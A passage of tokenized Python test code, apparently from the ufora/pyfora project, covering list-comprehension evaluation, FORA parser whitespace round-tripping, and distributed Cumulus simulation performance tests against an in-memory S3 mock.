<EOL> x = [ [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> , <NUM_LIT:4> ] , [ <NUM_LIT:5> , <NUM_LIT:6> ] ] <EOL> res = [ [ row [ ix ] for row in x ] for ix in [ <NUM_LIT:0> , <NUM_LIT:1> ] ] <EOL> return res [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> self . equivalentEvaluationTest ( nestedComprehensions ) <EOL> def test_lists_plus_nonlists ( self ) : <EOL> def f ( ) : <EOL> try : <EOL> return [ ] + <NUM_LIT:10> <EOL> except TypeError : <EOL> return None <EOL> self . equivalentEvaluationTestThatHandlesExceptions ( f ) <EOL> def test_access_list_comprehension_variable_fails ( self ) : <EOL> def f ( ) : <EOL> try : <EOL> result = [ x for x in range ( <NUM_LIT:10> ) ] <EOL> return x <EOL> except Exception : <EOL> return "<STR_LIT>" <EOL> try : <EOL> result = self . evaluateWithExecutor ( f ) <EOL> self . assertTrue ( False , result ) <EOL> except Exceptions . ComputationError as e : <EOL> self . assertIsInstance ( e . remoteException , Exceptions . InvalidPyforaOperation ) <EOL> def test_convertListOfTuple ( self ) : <EOL> x = [ ( <NUM_LIT:3> , <NUM_LIT:4> ) ] <EOL> def returnX ( ) : <EOL> return x <EOL> self . equivalentEvaluationTest ( returnX ) <EOL> def test_setitem_exception_is_meaningful ( self ) : <EOL> def f ( ) : <EOL> l = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> l [ <NUM_LIT:0> ] = <NUM_LIT:0> <EOL> try : <EOL> self . evaluateWithExecutor ( f ) <EOL> self . assertTrue ( False ) <EOL> except Exceptions . ComputationError as e : <EOL> self . assertIsInstance ( e . message , str ) <EOL> self . assertTrue ( e . trace is not None ) <EOL> def test_holding_a_mappable_1 ( self ) : <EOL> x = [ len ] <EOL> def f ( ) : <EOL> return x <EOL> self . equivalentEvaluationTest ( f ) <EOL> def test_holding_a_mappable_2 ( self ) : <EOL> y = numpy . array ( range ( <NUM_LIT:5> ) ) <EOL> x = [ y ] <EOL> def f ( ) : <EOL> return x [ <NUM_LIT:0> ] <EOL> self . equivalentEvaluationTest ( f ) <EOL> def test_large_lists_of_tuples_correct ( self ) : <EOL> def f ( ) : <EOL> return [ ( x , x + <NUM_LIT:1> ) for x in xrange ( <NUM_LIT> ) ] <EOL> self . equivalentEvaluationTest ( f ) </s>
<s> def convertableMember ( x ) : <EOL> return x * <NUM_LIT:2> <EOL> def unconvertableMember ( x ) : <EOL> x += <NUM_LIT:2> <EOL> x = x // <NUM_LIT:2> </s>
<s> import unittest <EOL> import ufora . native . FORA as ForaNative <EOL> import logging <EOL> class TestRandomWhitespaceInserter ( unittest . TestCase ) : <EOL> def test_1 ( self ) : <EOL> toParse = """<STR_LIT>""" <EOL> simpleParse1 = ForaNative . SimpleParseNode . parse ( toParse ) <EOL> whitespaceInserter = ForaNative . RandomWhitespaceInserter ( <NUM_LIT> ) <EOL> withWhitespace = whitespaceInserter . stringifyWithRandomWhitespaceAndComments ( simpleParse1 ) <EOL> simpleParse2 = ForaNative . SimpleParseNode . parse ( withWhitespace ) <EOL> self . assertEqual ( str ( simpleParse1 ) , str ( simpleParse2 ) ) <EOL> withWhitespace2 = whitespaceInserter . stringifyWithRandomWhitespaceAndComments ( simpleParse2 ) <EOL> self . assertNotEqual ( withWhitespace2 , withWhitespace ) <EOL> simpleParse2 = ForaNative . SimpleParseNode . parse ( withWhitespace2 ) <EOL> self . assertEqual ( str ( simpleParse1 ) , str ( simpleParse2 ) ) </s>
<s> import unittest <EOL> import time <EOL> import logging <EOL> import numpy <EOL> import ufora . native . Cumulus as CumulusNative <EOL> import ufora . cumulus . test . InMemoryCumulusSimulation as InMemoryCumulusSimulation <EOL> import ufora . distributed . S3 . InMemoryS3Interface as InMemoryS3Interface <EOL> import ufora . native . TCMalloc as TCMallocNative <EOL> import ufora . native . CallbackScheduler as CallbackScheduler <EOL> import ufora . test . PerformanceTestReporter as PerformanceTestReporter <EOL> import cPickle as pickle <EOL> callbackScheduler = CallbackScheduler . singletonForTesting ( ) <EOL> class CumulusWorkerDatasetLoadServiceIntegrationTest ( unittest . TestCase ) : <EOL> def assertBecomesTrueEventually ( self , f , timeout , msgFun ) : <EOL> t0 = time . time ( ) <EOL> while not f ( ) : <EOL> time . sleep ( <NUM_LIT> ) <EOL> if time . time ( ) - t0 > timeout : <EOL> self . assertTrue ( False , msgFun ( ) ) <EOL> def computeUsingSeveralWorkers ( self , * args , ** kwds ) : <EOL> return InMemoryCumulusSimulation . computeUsingSeveralWorkers ( * args , ** kwds ) <EOL> def test_PythonIoTaskService ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> for ix1 in range ( <NUM_LIT:20> ) : <EOL> for ix2 in range ( <NUM_LIT:20> ) : <EOL> s3 ( ) . setKeyValue ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" % ( ix1 , ix2 ) , <EOL> "<STR_LIT>" . join ( <EOL> ( "<STR_LIT>" % ( ix1 , ix2 , ix3 ) for ix3 in range ( <NUM_LIT> ) ) <EOL> ) <EOL> ) <EOL> text = """<STR_LIT>""" <EOL> self . assertIsNotNone ( self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:1> ) ) <EOL> def test_PythonIoTaskService2 ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> for ix1 in range ( <NUM_LIT:20> ) : <EOL> for ix2 in range ( <NUM_LIT:20> ) : <EOL> s3 ( ) . setKeyValue ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" % ( ix1 , ix2 ) , <EOL> "<STR_LIT>" . join ( <EOL> ( "<STR_LIT>" % ( ix1 , ix2 , ix3 ) for ix3 in range ( <NUM_LIT> ) ) <EOL> ) <EOL> ) <EOL> text = """<STR_LIT>""" <EOL> self . assertIsNotNone ( self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:1> ) ) <EOL> def test_PythonIoTaskService3 ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> s3 . setThroughputPerMachine ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT:20> ) <EOL> for ix in range ( <NUM_LIT> ) : <EOL> s3 ( ) . setKeyValue ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" % ix , <EOL> "<STR_LIT:U+0020>" * <NUM_LIT:10> * <NUM_LIT> * <NUM_LIT> <EOL> ) <EOL> text = """<STR_LIT>""" <EOL> self . assertIsNotNone ( self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> , blockUntilConnected = True ) ) <EOL> totalBytecount = <NUM_LIT:0> <EOL> for machine , bytecount in s3 . getPerMachineBytecounts ( ) . iteritems ( ) : <EOL> totalBytecount += bytecount <EOL> self . assertTrue ( totalBytecount / <NUM_LIT> / <NUM_LIT> <= <NUM_LIT> , totalBytecount / <NUM_LIT> / <NUM_LIT> ) <EOL> def test_PythonIoTaskServiceInLoop ( self ) : <EOL> bytesUsed = [ ] <EOL> for ix in range ( <NUM_LIT:20> ) : <EOL> bytesUsed . append ( TCMallocNative . getMemoryStat ( "<STR_LIT>" ) / <NUM_LIT> / <NUM_LIT> ) <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> s3 . setThroughputPerMachine ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT:20> ) <EOL> for ix in range ( <NUM_LIT> ) : <EOL> s3 ( ) . setKeyValue ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" % ix , <EOL> "<STR_LIT:U+0020>" * <NUM_LIT:10> * <NUM_LIT> * <NUM_LIT> <EOL> ) <EOL> text = """<STR_LIT>""" <EOL> self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> , blockUntilConnected = True ) <EOL> self . assertTrue ( bytesUsed [ <NUM_LIT:0> ] < bytesUsed [ - <NUM_LIT:1> ] - <NUM_LIT:100> , bytesUsed ) <EOL> def test_CalculationRicochet ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> text = """<STR_LIT>""" <EOL> vResult , sim = InMemoryCumulusSimulation . computeUsingSeveralWorkers ( <EOL> "<STR_LIT>" , <EOL> s3 , <EOL> <NUM_LIT:4> , <EOL> timeout = <NUM_LIT> , <EOL> memoryLimitMb = <NUM_LIT> , <EOL> threadCount = <NUM_LIT:1> , <EOL> useInMemoryCache = True , <EOL> returnSimulation = True <EOL> ) <EOL> try : <EOL> v = vResult . asResult . result <EOL> t0 = time . time ( ) <EOL> sim . compute ( text . replace ( "<STR_LIT>" , "<STR_LIT:1>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) , timeout = <NUM_LIT> , v = v ) <EOL> PerformanceTestReporter . recordTest ( "<STR_LIT>" , time . time ( ) - t0 , None ) <EOL> t0 = time . time ( ) <EOL> sim . compute ( text . replace ( "<STR_LIT>" , "<STR_LIT:2>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) , timeout = <NUM_LIT> , v = v ) <EOL> PerformanceTestReporter . recordTest ( "<STR_LIT>" , time . time ( ) - t0 , None ) <EOL> finally : <EOL> sim . teardown ( ) <EOL> def dataCreationTest ( self , totalMB , workers = <NUM_LIT:1> , threadsPerWorker = <NUM_LIT:4> ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> text = """<STR_LIT>""" % ( totalMB * <NUM_LIT> * <NUM_LIT> / <NUM_LIT:8> ) <EOL> self . assertIsNotNone ( <EOL> self . computeUsingSeveralWorkers ( <EOL> text , <EOL> s3 , <EOL> workers , <EOL> timeout = <NUM_LIT> , <EOL> memoryLimitMb = totalMB / workers * <NUM_LIT> , <EOL> threadCount = threadsPerWorker , <EOL> useInMemoryCache = False <EOL> ) <EOL> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_createData_500_1 ( self ) : <EOL> self . dataCreationTest ( <NUM_LIT> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_createData_1000_1 ( self ) : <EOL> self . dataCreationTest ( <NUM_LIT:1000> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_createData_2000_1 ( self ) : <EOL> self . dataCreationTest ( <NUM_LIT> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_createData_500_2 ( self ) : <EOL> self . dataCreationTest ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_createData_1000_2 ( self ) : <EOL> self . dataCreationTest ( <NUM_LIT:1000> , <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_createData_2000_2 ( self ) : <EOL> self . dataCreationTest ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_DataFanout ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> text = """<STR_LIT>""" <EOL> self . assertIsNotNone ( self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> ) ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_LargeCSVParse ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> for ix1 in range ( <NUM_LIT:10> ) : <EOL> s3 ( ) . setKeyValue ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" % ix1 , <EOL> "<STR_LIT>" . join ( <EOL> ( "<STR_LIT>" % ( ix1 , ix2 , ix1 * ix2 ) for ix2 in range ( <NUM_LIT> ) ) <EOL> ) <EOL> ) <EOL> text = """<STR_LIT>""" <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , memoryLimitMb = <NUM_LIT> , timeout = <NUM_LIT> ) <EOL> self . assertTrue ( res . isResult ( ) , res ) <EOL> self . assertEqual ( res . asResult . result . pyval , <NUM_LIT:10> * <NUM_LIT> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_CreateManySmallVectors ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> text = """<STR_LIT>""" <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> ) <EOL> self . assertTrue ( res . isResult ( ) ) <EOL> self . assertEqual ( res . asResult . result . pyval , <NUM_LIT> ) <EOL> def test_CalculateWithCachecallsFirst ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> text = """<STR_LIT>""" <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , timeout = <NUM_LIT:30> ) <EOL> self . assertIsNotNone ( res ) <EOL> self . assertTrue ( res . isResult ( ) ) <EOL> self . assertEqual ( res . asResult . result . pyval , "<STR_LIT:OK>" ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_CachecallsAndVectors ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> text = """<STR_LIT>""" <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , timeout = <NUM_LIT:20> ) <EOL> self . assertTrue ( res . isResult ( ) ) <EOL> self . assertEqual ( res . asResult . result . pyval , "<STR_LIT:OK>" ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_VectorsAndSums ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> text = """<STR_LIT>""" <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , timeout = <NUM_LIT:20> ) <EOL> self . assertTrue ( res . isResult ( ) , res ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_ParseRowsAsFloatVectors ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> rows = <NUM_LIT> <EOL> bucketData = "<STR_LIT:\n>" . join ( <EOL> [ "<STR_LIT:U+002C>" . join ( [ str ( ( ( x * row ) ** <NUM_LIT:2> ) % <NUM_LIT> ) for x in range ( <NUM_LIT:200> ) ] ) for row in range ( rows ) ] <EOL> ) <EOL> s3 ( ) . setKeyValue ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:key>" , <EOL> bucketData <EOL> ) <EOL> text = """<STR_LIT>""" <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , timeout = <NUM_LIT:30> ) <EOL> self . assertTrue ( res . isResult ( ) , res ) <EOL> self . assertEqual ( res . asResult . result . pyval , rows ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_ParseRowsAsFloatTuples ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> rows = <NUM_LIT> <EOL> bucketData = "<STR_LIT:\n>" . join ( <EOL> [ "<STR_LIT:U+002C>" . join ( [ str ( ( ( x * row ) ** <NUM_LIT:2> ) % <NUM_LIT> ) for x in range ( <NUM_LIT:200> ) ] ) for row in range ( rows ) ] <EOL> ) <EOL> s3 ( ) . setKeyValue ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:key>" , <EOL> bucketData <EOL> ) <EOL> text = """<STR_LIT>""" <EOL> t0 = time . time ( ) <EOL> parsedInPython2 = [ [ float ( x ) for x in row . split ( "<STR_LIT:U+002C>" ) ] for row in bucketData . split ( "<STR_LIT:\n>" ) ] <EOL> pythonTime = time . time ( ) - t0 <EOL> t0 = time . time ( ) <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , memoryLimitMb = <NUM_LIT> , timeout = <NUM_LIT> ) <EOL> foraTime = time . time ( ) - t0 <EOL> t0 = time . time ( ) <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , memoryLimitMb = <NUM_LIT> , timeout = <NUM_LIT> ) <EOL> foraTime2 = time . time ( ) - t0 <EOL> self . assertTrue ( res . isResult ( ) , res ) <EOL> self . assertEqual ( res . asResult . result . pyval , rows ) <EOL> print "<STR_LIT>" % ( foraTime , foraTime2 , pythonTime , foraTime / pythonTime ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_largeVectorRange ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> res = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT:200> ) <EOL> if res . isResult ( ) : <EOL> self . assertEqual ( res . asResult . result . pyvalOrNone , <NUM_LIT> * <NUM_LIT:10> , res ) <EOL> else : <EOL> self . assertTrue ( False , res ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_sortLargeVectorRange ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> for ix in range ( <NUM_LIT:2> ) : <EOL> t0 = time . time ( ) <EOL> self . computeUsingSeveralWorkers ( """<STR_LIT>""" , <EOL> s3 , <EOL> <NUM_LIT:4> , <EOL> timeout = <NUM_LIT> <EOL> ) <EOL> foraTime = time . time ( ) - t0 <EOL> t0 = time . time ( ) <EOL> v = [ ( ix ** <NUM_LIT> % <NUM_LIT> , ix ) for ix in range ( <NUM_LIT:4> * <NUM_LIT:1000> * <NUM_LIT:1000> ) ] <EOL> v = sorted ( v ) <EOL> pyTime = time . time ( ) - t0 <EOL> print "<STR_LIT>" % ( pyTime , foraTime , pyTime / foraTime ) <EOL> def test_sortVec2 ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> ) <EOL> self . assertEqual ( result . asResult . result . pyval , True ) <EOL> def test_performManySums ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> for ix in range ( <NUM_LIT:2> ) : <EOL> t0 = time . time ( ) <EOL> self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> <EOL> ) <EOL> foraTime = time . time ( ) - t0 <EOL> t0 = time . time ( ) <EOL> v = numpy . ones ( <NUM_LIT> ) . cumsum ( ) - <NUM_LIT:1> <EOL> for ix in range ( <NUM_LIT:100> ) : <EOL> ( v + ix ) . sum ( ) <EOL> pyTime = time . time ( ) - t0 <EOL> print "<STR_LIT>" % ( pyTime , foraTime , pyTime / foraTime ) <EOL> def test_computeManyGetitems ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> interpreterTimes = [ ] <EOL> for ix in range ( <NUM_LIT:10> ) : <EOL> interpTime = self . computeUsingSeveralWorkers ( """<STR_LIT>""" % ix , s3 , <NUM_LIT:1> , wantsStats = True , timeout = <NUM_LIT> <EOL> ) [ <NUM_LIT:1> ] . timeSpentInInterpreter <EOL> interpreterTimes . append ( interpTime ) <EOL> for interpTime in interpreterTimes [ <NUM_LIT:1> : ] : <EOL> self . assertLess ( interpTime , ( sum ( interpreterTimes ) - interpTime ) / ( len ( interpreterTimes ) - <NUM_LIT:1> ) * <NUM_LIT:10> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_gcOfPagedVectors ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> <EOL> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_produceLotsOfData ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result , simulation = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> , returnSimulation = True <EOL> ) <EOL> try : <EOL> def test ( ) : <EOL> for worker , vdm , eventHandler in simulation . workersVdmsAndEventHandlers : <EOL> self . assertTrue ( <EOL> vdm . curTotalUsedBytes ( ) < <NUM_LIT> * <NUM_LIT> * <NUM_LIT> , <EOL> "<STR_LIT>" % ( vdm . curTotalUsedBytes ( ) / <NUM_LIT> / <NUM_LIT> ) <EOL> ) <EOL> test ( ) <EOL> finally : <EOL> simulation . teardown ( ) <EOL> def test_schedulerEventsAreSerializable ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result , simulation = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> , returnSimulation = True <EOL> ) <EOL> try : <EOL> someHadEvents = False <EOL> for worker , vdm , eventHandler in simulation . workersVdmsAndEventHandlers : <EOL> events = eventHandler . extractEvents ( ) <EOL> events2 = pickle . loads ( pickle . dumps ( events ) ) <EOL> print len ( events ) , "<STR_LIT>" <EOL> print len ( pickle . dumps ( events ) ) , "<STR_LIT>" <EOL> print len ( pickle . dumps ( events ) ) / len ( events ) , "<STR_LIT>" <EOL> self . assertTrue ( len ( events2 ) == len ( events ) ) <EOL> if len ( events ) : <EOL> someHadEvents = True <EOL> CumulusNative . replayCumulusWorkerEventStream ( events , True ) <EOL> self . assertTrue ( someHadEvents ) <EOL> worker = None <EOL> vdm = None <EOL> eventHandler = None <EOL> finally : <EOL> simulation . teardown ( ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_fanout ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> <EOL> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_vector_string_apply ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> InMemoryCumulusSimulation . computeUsingSeveralWorkers ( """<STR_LIT>""" , <EOL> s3 , <EOL> <NUM_LIT:4> , <EOL> timeout = <NUM_LIT> <EOL> ) <EOL> def test_page_glomming_basic ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result , simulation = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> , returnSimulation = True <EOL> ) <EOL> try : <EOL> sprt = simulation . getWorker ( <NUM_LIT:0> ) . getSystemwidePageRefcountTracker ( ) <EOL> def activePageCount ( ) : <EOL> return len ( [ x for x in sprt . getAllPages ( ) if sprt . machinesWithPageInRam ( x ) ] ) <EOL> self . assertBecomesTrueEventually ( lambda : activePageCount ( ) == <NUM_LIT:1> , <NUM_LIT> , <EOL> lambda : "<STR_LIT>" <EOL> % ( len ( sprt . getAllPages ( ) ) , sprt . getViewOfSystem ( ) ) <EOL> ) <EOL> sprt = None <EOL> finally : <EOL> simulation . teardown ( ) <EOL> def test_page_glomming_multiple ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result , simulation = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> , returnSimulation = True <EOL> ) <EOL> try : <EOL> sprt = simulation . getWorker ( <NUM_LIT:0> ) . getSystemwidePageRefcountTracker ( ) <EOL> def activePageCount ( ) : <EOL> return len ( [ x for x in sprt . getAllPages ( ) if sprt . machinesWithPageInRam ( x ) ] ) <EOL> self . assertBecomesTrueEventually ( lambda : activePageCount ( ) <= <NUM_LIT:10> , <NUM_LIT> , <EOL> lambda : "<STR_LIT>" <EOL> % ( activePageCount ( ) , sprt . getViewOfSystem ( ) ) <EOL> ) <EOL> sprt = None <EOL> finally : <EOL> simulation . teardown ( ) <EOL> def test_page_glomming_common_pages ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result , simulation = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> , returnSimulation = True <EOL> ) <EOL> try : <EOL> sprt = simulation . getWorker ( <NUM_LIT:0> ) . getSystemwidePageRefcountTracker ( ) <EOL> def noOrphanedPages ( ) : <EOL> return len ( sprt . getPagesThatAppearOrphaned ( ) ) == <NUM_LIT:0> <EOL> self . assertBecomesTrueEventually ( noOrphanedPages , <NUM_LIT> , <EOL> lambda : "<STR_LIT>" <EOL> % ( sprt . getViewOfSystem ( ) ) <EOL> ) <EOL> sprt = None <EOL> finally : <EOL> simulation . teardown ( ) <EOL> def test_invalidURL ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> res = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:1> ) <EOL> self . assertTrue ( res . isException ( ) ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_vector_transpose ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> _ , simulation = InMemoryCumulusSimulation . computeUsingSeveralWorkers ( "<STR_LIT>" , <EOL> s3 , <EOL> <NUM_LIT:2> , <EOL> memoryLimitMb = <NUM_LIT> , <EOL> timeout = <NUM_LIT:10> , <EOL> returnSimulation = True , <EOL> channelThroughputMBPerSecond = <NUM_LIT> <EOL> ) <EOL> try : <EOL> result = simulation . compute ( """<STR_LIT>""" , <EOL> timeout = <NUM_LIT> <EOL> ) <EOL> self . assertTrue ( result . isResult ( ) ) <EOL> finally : <EOL> simulation . teardown ( ) <EOL> def disable_createVectorAndReferenceInMultipleComputations ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result , simulation = self . computeUsingSeveralWorkers ( <EOL> "<STR_LIT>" , <EOL> s3 , <EOL> <NUM_LIT:2> , <EOL> memoryLimitMb = <NUM_LIT:1000> , <EOL> returnSimulation = True , <EOL> useInMemoryCache = False <EOL> ) <EOL> try : <EOL> vecComputation = simulation . createComputation ( <EOL> """<STR_LIT>""" <EOL> ) <EOL> predComp = simulation . createComputation ( "<STR_LIT>" , vecs = vecComputation ) <EOL> regComp = simulation . createComputation ( "<STR_LIT>" , vecs = vecComputation ) <EOL> predCompStr = simulation . createComputation ( "<STR_LIT>" , pred = predComp ) <EOL> regCompStr = simulation . createComputation ( "<STR_LIT>" , reg = regComp ) <EOL> vecSumComp = simulation . createComputation ( "<STR_LIT>" , vecs = vecComputation ) <EOL> simulation . submitComputation ( predCompStr ) <EOL> simulation . submitComputation ( regCompStr ) <EOL> simulation . submitComputation ( vecSumComp ) <EOL> r1 = simulation . waitForAnyResult ( timeout = <NUM_LIT> ) <EOL> r2 = simulation . waitForAnyResult ( timeout = <NUM_LIT> ) <EOL> r3 = simulation . waitForAnyResult ( timeout = <NUM_LIT> ) <EOL> sprt = simulation . getWorker ( <NUM_LIT:0> ) . getSystemwidePageRefcountTracker ( ) <EOL> totalGb = sum ( [ x . bytecount for x in sprt . getAllActivePages ( ) ] ) / <NUM_LIT> / <NUM_LIT> / <NUM_LIT> <EOL> logging . critical ( "<STR_LIT:%s>" , sprt . getViewOfSystem ( ) ) <EOL> self . assertTrue ( totalGb < <NUM_LIT> , totalGb ) <EOL> finally : <EOL> simulation . teardown ( ) <EOL> def test_vectorCreateCloseToLimit ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result , simulation = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , <EOL> s3 , <EOL> <NUM_LIT:4> , <EOL> memoryLimitMb = <NUM_LIT> , <EOL> timeout = <NUM_LIT> , <EOL> returnSimulation = True , <EOL> useInMemoryCache = False <EOL> ) <EOL> try : <EOL> for ix in range ( simulation . getWorkerCount ( ) ) : <EOL> self . assertEqual ( <EOL> simulation . getWorkerVdm ( ix ) . getOfflineCache ( ) . cacheItemCount , <EOL> <NUM_LIT:0> <EOL> ) <EOL> except : <EOL> simulation . dumpSchedulerEventStreams ( ) <EOL> raise <EOL> finally : <EOL> simulation . teardown ( ) <EOL> def test_vecWithinVecReading ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , <EOL> s3 , <EOL> <NUM_LIT:4> , <EOL> memoryLimitMb = <NUM_LIT> , <EOL> timeout = <NUM_LIT> , <EOL> useInMemoryCache = False <EOL> ) <EOL> self . assertTrue ( result . isResult ( ) ) <EOL> self . assertTrue ( result . asResult . result . pyval == True ) <EOL> def test_expansionWithVecOfVec ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> simulation = InMemoryCumulusSimulation . InMemoryCumulusSimulation ( <EOL> <NUM_LIT:4> , <EOL> <NUM_LIT:1> , <EOL> memoryPerWorkerMB = <NUM_LIT:100> , <EOL> threadsPerWorker = <NUM_LIT:2> , <EOL> s3Service = s3 <EOL> ) <EOL> try : <EOL> self . assertTrue ( simulation . waitForGlobalScheduler ( timeout = <NUM_LIT> ) ) <EOL> simulation . getGlobalScheduler ( ) . setCheckpointStatusInterval ( <NUM_LIT> ) <EOL> simulation 